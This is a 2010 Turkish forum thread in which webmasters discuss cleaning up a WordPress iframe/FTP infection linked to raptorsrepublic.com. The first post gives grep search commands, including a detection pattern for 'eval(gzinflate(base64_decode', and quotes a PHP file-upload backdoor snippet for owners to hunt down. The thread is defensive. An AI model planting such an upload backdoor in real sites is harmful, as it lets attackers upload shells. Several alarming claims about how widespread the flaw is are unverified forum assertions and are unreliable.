• 09-09-2010, 19:26:40
    #1
    Yaklaşık 5 gündür mevcut bir virüsün yapısını inceliyorum.Basit bir iframe virusu gibi görünsede gayet kapsamlı.

    www.raptorsrepublic.com isimli sitenin kodları sitenize ekleniyor.Bu açıkta genel olarak ftpden bulaşmayıp genel wordpress sitelerden sunucuya geçmektedir.

    Öncelikle raptorsrepublic ile ilgili bir vürus sitenize bulaşmışsa;
    ssh hesabında root olarak sunucu sahibi;

    1. yapılacak;

    1.
    find / -name "*"."*" -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
    2.
    find /home -name "*".php -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
    3.
    find /home -name "*".js -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
    4.
    find /home -name "*".php -type f -print0 | xargs -0 grep http://www.4ngel.net
    5.
    find /home -name "*".js -type f -print0 | xargs -0 grep http://www.4ngel.net
    6.
    find /home -type f -print0 -name "*.php*" | xargs -0 grep -l "eval(gzinflate(base64_decode"

    yukarıdaki altı aramayı yapsın ve çıkan dosyaların yapısını incelesin.Buna benzer base64 veya ioncube şifreli upload izni veren scriptler kuruyorlar.mevcut dosyalarınıza bu kodu ekledikleri an siz sayfanız da göremesenizde siteniz bir upload makinasına dönüşüyor.istedikleri shelli yukleyip sitenize mudahale ediyorlar.

    2. yapılacak:

    Tüm hesapları suspend edip sunucuda alttaki kodu bulunduran dosyalar bulunsn.Tüm ftpnizdeki html ve php dosyalarda alttakine benzer upload sistemli dosyaları arayın.
    if($_POST[git]){
    		$isim = $say.$_FILES["dosya"]["name"];
    		$dosyakaynak = $_FILES["dosya"]["tmp_name"]; 
    		$dosyaisim = latinChars($isim); 
    		$dosyauzanti = $_FILES["dosya"]["type"]; 
    		$dosyaboyut = $_FILES["dosya"]["size"]; 
    		$dosyahedef = "include/"; 
    		$dosyayukle = move_uploaded_file($dosyakaynak,$dosyahedef.$dosyaisim);
    }
    ?> 
    
    
    <form action="ajax.php?id=curl" method="post" enctype="multipart/form-data">
    <input type="file" name="dosya" />
    <input type="submit" alue=" " name="git" />
    Genel olarak bu aramayla uğraşmak istenilmiyorsa site sahibi tüm ftpsini sıfırlatsın.Sıfır wp kursun yada hangi scripti kullanıyorsa.

    EN SON İSE wp-admin klasorunuz eğerki şifreli değilse hemen şifreleyin.Genel olarak hitli sitelerle uğraşıyorlar.Gene olarak curl kullanarak hesabınıza giriyorlar.Sitenizin sonuna wp-admin/admin-ajax.php?id=curl ekleyerek kendi sitenizdede benzer curl açıklarını gözlemleyebilirsiniz.

    Yaklaşık 5 gün süren bir uğraş sonucu çözüme ulaştım.Herkes 5 gün harcamasın tüm wp site sahipleride uygulasın sitenize kod eklendikten birkaçgun sonra siteniz bu site bilgisayarınıza zarar verebilir uyarısı verecektir.
    Ayrıca sunucu tmp dizininide mutlaka securetmp edin ve temizlemeden sonra mutlaka db user ve pass değerlerini değiştirip ioncube ile wp-config dosyanızı şifreleyin.

    BUNUN DIŞINDA TUM WPTRDEN İNEN WPLERDE ŞUAN SHEL SCRİPT KENDİ İÇİNDE GELİYOR.YABANCI SÜRÜMÜ ŞUAN İNCELİYORUM.film izle gibi populer bir kelimedeki 10 siteden 2-3 unde ilk sayfada bu açığa rastladım.

    Samet Yiğit
    Dizinler arası geçiş için inceleyin: dizinler arası geçişi kapatmak
    İyi çalışmalar.
  • 09-09-2010, 19:35:54
    #2
    Başlık yanlış olmuş bu wp ye özel bi güvenlik açığı degil
  • 09-09-2010, 19:38:40
    #3
    Tek wp değil ama sunucularda ilk giriş yerleri wp oluyor.Wp siteleri tarıyorlar ve tarama olarakta w00tw00t.at sistemini kullanıyorlar.Wordpressdede curl sistemini kullandıklarını altta belirttim.
  • 09-09-2010, 21:17:49
    #4
    Üyeliği durduruldu
    güzel 1 calisma benim basima musallat oldu bakalim uygulayalim sonucu buraya bildirecegim
  • 09-09-2010, 21:35:33
    #5
    farklı hocam hemen surum düşürün bunu soyleyeyim size.burda buldugumuz açıgı yazarsam inan bana wplerin %90 ı hacklenir.Birçok buyuk firmadaki son surum wplere baktım aynı açık mevcut.
  • 09-09-2010, 21:38:21
    #6
    sametyigit adlı üyeden alıntı: mesajı görüntüle
    farklı hocam hemen surum düşürün bunu soyleyeyim size.burda buldugumuz açıgı yazarsam inan bana wplerin %90 ı hacklenir.
    Umarım hackercik ler bu açıktan haberdar olmazlar.
    Bildiriminiz için teşekkür ederim.
  • 09-09-2010, 21:43:20
    #7
    bu ftp virusude son zamanlarda yaygınlaşmaya ve çeşitlenmeye başladı iyice böyle konulara herzaman ihtiyaç duyulur teşekkürler yazı için...
  • 09-09-2010, 22:15:54
    #8
    Yok genel olarak uğraştık bulduk ve açık ylunu vermeden 2 wp musterimizin sitesinin işlemlerini yapıyoruz.Birçok arkadaşımız tehlikede şuanda.Googleden film izle kelimesinde yer alan 10 siteden 2-3 unde ratladım bu açıga.Şoyle ifade edeyim wp bilgileriniz yani db vs tamamen dıştan mudahale edilebiliyor ve kesinlikle sunucu tabanlı engellenemiyor.Yenibirkonu daha açacaktım ama gerek görmedim. Wordpressle iletişime geçmeye çalışıyoruz.Yabancı surumu deneyeceğim az sonra inş ondada yoktur.
  • 09-09-2010, 22:39:24
    #9
    Kimlik doğrulama veya yönetimden onay bekliyor.
    İstedikleri shelli yükleyebiliyorlar dediniz yanlış anlamadıysam. O zaman php.iniden allow_remote_include kısmı kapansa bu tarz php den gelecek uzak include lara çözüm bulmuş oluruz sanıyorum.